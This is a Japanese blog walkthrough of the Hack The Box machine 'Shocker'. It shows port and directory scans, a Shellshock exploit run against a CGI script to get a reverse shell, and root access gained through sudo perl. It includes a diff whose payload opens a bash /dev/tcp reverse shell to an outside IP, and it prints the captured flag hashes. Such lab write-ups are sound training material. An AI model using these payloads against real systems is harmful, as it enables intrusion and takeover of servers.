Hack The Box – Shocker – Walkthrough – 忘れるために記す

SMBが公開されている

# nmap -A -n -F -T5 shocker.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 03:23 UTC
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.045s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: print server|printer|general purpose|VoIP phone|broadband router
Running (JUST GUESSING): HP embedded (90%), IBM AIX 4.X (86%), Tadiran embedded (85%), Wind River VxWorks 5.X (85%), Motorola embedded (85%), Microsoft Windows 2003|XP (85%)
OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000 cpe:/o:ibm:aix:4.3 cpe:/h:tadiran:flexset-ip_280s cpe:/o:windriver:vxworks:5.4 cpe:/h:motorola:surfboard_sbv5121 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_xp
Aggressive OS guesses: HP 170X print server or Inkjet 3000 printer (90%), HP LaserJet 4250 printer (87%), IBM AIX 4.3 (86%), Tadiran FlexSet-IP 280S VoIP phone (85%), Motorola SURFboard SBV5121 broadband router (VxWorks 5.4) (85%), Microsoft Windows Server 2003 SP2 (85%), Microsoft Windows XP (85%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

80番ポートにアクセスしてみる

gobusterではフォルダを見つけられなかった。

# gobuster dir -u http://shocker.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://shocker.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/16 03:30:41 Starting gobuster
===============================================================
Progress: 65661 / 220561 (29.77%)

dirbを利用して、/cgi-bin/user.shがあることがわかる。

# dirb http://shocker.htb/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Aug 16 07:39:22 2020
URL_BASE: http://shocker.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:137)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)

-----------------
END_TIME: Sun Aug 16 07:57:47 2020
DOWNLOADED: 4612 - FOUND: 3

# dirb http://shocker.htb/cgi-bin/ -w /usr/share/dirb/common.txt -X .sh

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Aug 16 08:01:30 2020
URL_BASE: http://shocker.htb/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://shocker.htb/cgi-bin/ ----
+ http://shocker.htb/cgi-bin/user.sh (CODE:200|SIZE:118)

-----------------
END_TIME: Sun Aug 16 08:20:29 2020
DOWNLOADED: 4612 - FOUND: 1

マシン名的にShellShockを試してみる

# searchsploit shellshock
--------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                       | cgi/remote/38849.rb
Apache mod_cgi - 'Shellshock' Remote Command Injection                                                         | linux/remote/34900.py
Bash - 'Shellshock' Environment Variables Command Injection                                                    | linux/remote/34766.php
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)                                                  | cgi/webapps/34895.rb
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)                                              | hardware/remote/39568.py
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)                                        | linux/remote/36933.py
GNU Bash - 'Shellshock' Environment Variable Command Injection                                                 | linux/remote/34765.txt
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                                 | cgi/remote/39918.rb
NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)                                                   | cgi/webapps/40213.txt
OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection                                                         | linux/remote/34879.txt
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection                            | php/webapps/35146.txt
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection                                            | linux/remote/34896.py
RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection                                          | linux/local/40938.py
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)                  | cgi/webapps/39887.txt
TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection                    | hardware/remote/40619.py
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

# searchsploit -m linux/remote/34900.py

# sed -i 's/\r//' 34900.py

# python 34900.py payload=reverse rhost=10.10.10.56 lhost=172.17.0.2 lport=4444 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 172.17.0.1
172.17.0.1> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

172.17.0.1> pwd
/usr/lib/cgi-bin

172.17.0.1> cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233

172.17.0.1> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

172.17.0.1> sudo /usr/bin/perl -e 'exec "/bin/bash";'
172.17.0.1> id
uid=0(root) gid=0(root) groups=0(root)

172.17.0.1> cat /root/root.txt
52c2715605d70c7619030560dc1ca467

KaliLinuxをDockerで動作させているため、34900.pyを一部修正している。

# diff 34900.py /usr/share/exploitdb/exploits/linux/remote/34900.py
76c76
<               payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.14.7/"+str(lport)+" 0>&1 &"
---
>               payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"

SMBが公開されている

80番ポートにアクセスしてみる

マシン名的にShellShockを試してみる

おすすめ

WordPress Security Scanner(GEEKFLARE)で脆弱性診断して、jQueryをバージョンアップした

Hack The Box – Curling – Walkthrough

JavaScriptのコードを難読化してみた